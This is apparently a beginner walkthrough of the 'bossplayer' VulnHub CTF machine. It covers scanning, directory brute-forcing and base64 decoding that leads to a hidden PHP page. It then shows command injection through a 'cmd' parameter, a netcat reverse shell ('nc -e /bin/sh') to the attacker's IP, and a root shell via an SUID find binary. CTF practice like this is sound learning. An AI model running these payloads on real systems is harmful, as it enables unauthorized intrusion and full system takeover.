bossplayer ctf walkthrough
In this article we will solve another CTF challenge . This CTF challenge is for beginners. we can download this machine from vulnhub.
First step is to find the IP address of the target by using the command : netdiscover -i wlan0
Now next step is to check for the open ports and for that we used the command : nmap -A 192.168.43.152
we can see that only two ports are open and these are 22(SSH) and 80(HTTP). So we decided to browse HTTP Service by opening a browser and type the URL 192.168.43.152:80
So this is what webpage looks like . Now we decided to find hidden files and directories because there is no hint for us. To find hidden files and directories we use a tool dirb . This is a tool which comes preinstalled in Kali Linux OS. So we run this tool by using the command : dirb http://192.168.43.152
We have found these 3 files . we decided to open http://192.168.43.152/robots.txt
and we found this :
it looks like it is encoded in base64 format so we decided to decode it by using the command : echo bG9sIHRyeSBoYXJkZXIgYnJvCg== | base64 -d
So it is useless for us!!
Now after this we open the source code of the webpage and at the last of the source code we found another string encoded in base64 format.
So by using the same command we decode the text as : echo WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK | base64 -d
so after decoding the first string we get another string encoded in base64 format so we again decode it and again we found a string encode in base64 format ,so we decode it also and one more time we have a string in same format and after decoding it we get a text as workinginprogress.php . So it can be a new page so we open this URL http://192.168.43.152/workinginprogress.php
So after thinking a lot we came up with a solution and that is what if we try to execute some OS command by using http://192.168.43.152/workinginprogress.php?cmd=id; , then yes we were right , after executing this command we got the desired output
it means we can execute nc also to get a shell . Please read the article : https://www.haclabs.org/post/beginners-guide-to-netcat to know more about nc.
so we used this URL : http://192.168.43.152/workinginprogress.php?cmd=nc -e /bin/sh 192.168.43.9 4444 to get a shell and do not forget to start listener on Kali Linux by using the command : nc -nlvp 4444 before executing the above URL.
Now we seek for SUID binaries by using the command : find / -perm -u=s -type f 2>/dev/null
Here we can use find binary to get root shell by using the command :
find . -exec /bin/sh -p \; -quit
So we have root shell and we confirmed it by executing the command id